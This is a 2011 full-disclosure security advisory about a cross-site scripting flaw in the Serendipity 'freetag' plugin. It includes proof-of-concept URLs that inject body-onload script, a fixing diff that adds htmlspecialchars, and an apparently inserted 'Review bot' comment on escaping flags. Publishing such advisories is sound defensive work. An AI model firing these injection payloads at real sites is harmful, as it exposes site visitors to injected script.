Message-ID: <4DE513D8.6090700@t-online.de>
Date: Tue, 31 May 2011 18:14:16 +0200
From: "sschurtz@...nline.de" <sschurtz@...nline.de>
To: full-disclosure@...ts.grok.org.uk
Subject: Cross-Site Scripting vulnerability in Serendipity
	Plugin "serendipity_event_freetag"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Advisory:              Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag"
Advisory ID:           SSCHADV2011-004
Author:                Stefan Schurtz
Affected Software:     Successfully tested on: Serendipity 1.5.5 with serendipity_event_freetag - version 3.21
Vendor URL:            http://www.s9y.org
Vendor Status:         Version 3.22 - Fix possible XSS
CVE-ID:                -

==========================
Vulnerability Description:
==========================

This is a Cross-Site Scripting vulnerability

==================
Technical Details:
==================

http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body
onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body
onload=alert(String.fromCharCode(88,83,83))>

http://www.example.com/serendipity/index.php?/plugin/tag/<body
onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/<body
onload=alert(String.fromCharCode(88,83,83))>

=========
Solution:
=========

Update to the latest version 3.22

diff serendipity_event_freetag.php

< <?php #$Id: serendipity_event_freetag.php,v 1.148 2011/05/09 08:19:30
garvinhicking Exp $
> <?php #$Id: serendipity_event_freetag.php,v 1.149 2011/05/30 20:25:24
garvinhicking Exp $

<  $propbag->add('version',       '3.21');
>  $propbag->add('version',       '3.22');

<  $serendipity['smarty']->assign('freetag_tagTitle',
is_array($this->displayTag) ? implode(' + ',$this->displayTag) :
$this->displayTag);
>  $serendipity['smarty']->assign('freetag_tagTitle',
htmlspecialchars(is_array($this->displayTag) ? implode(' +
',$this->displayTag) : $this->displayTag));
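
Review bot: htmlspecialchars() on the new freetag_tagTitle line is called with no flags or charset argument, so it runs with the ENT_COMPAT default and leaves single quotes unencoded. That is enough when the value lands in element content, but not if a template ever places freetag_tagTitle inside a single-quoted attribute. Suggest passing ENT_QUOTES and the blog's charset explicitly. Also, only this one Smarty assign is escaped in the visible lines; any other place that outputs $this->displayTag would need the same encoding, so it is worth confirming each remaining sink encodes on output before treating the issue as closed.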

====================
Disclosure Timeline:
====================

30-May-2011 - informed developers
30-May-2011 - Release date of this security advisory
30-May-2011 - Version 3.22 - Fix possible XSS
31-May-2011 - post on BugTraq and Full-disclosure

========
Credits:
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References:
===========

http://www.s9y.org
http://www.rul3z.de/advisories/SSCHADV2011-004.txt
http://ha.ckers.org/xss.html
http://blog.s9y.org/archives/231-serendipity_event_freetag-Plugin-update,-XSS-bug.html
http://www.securityfocus.com/archive/1/518191/30/0/threaded
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEUEARECAAYFAk3lE9gACgkQg3svV2LcbMCkTQCXaQJI6tF86BjiD39MoyApw7u0
JACfc3zu6QhrU4tKsvR3IVCucPw69sg=
=6mbq
-----END PGP SIGNATURE-----
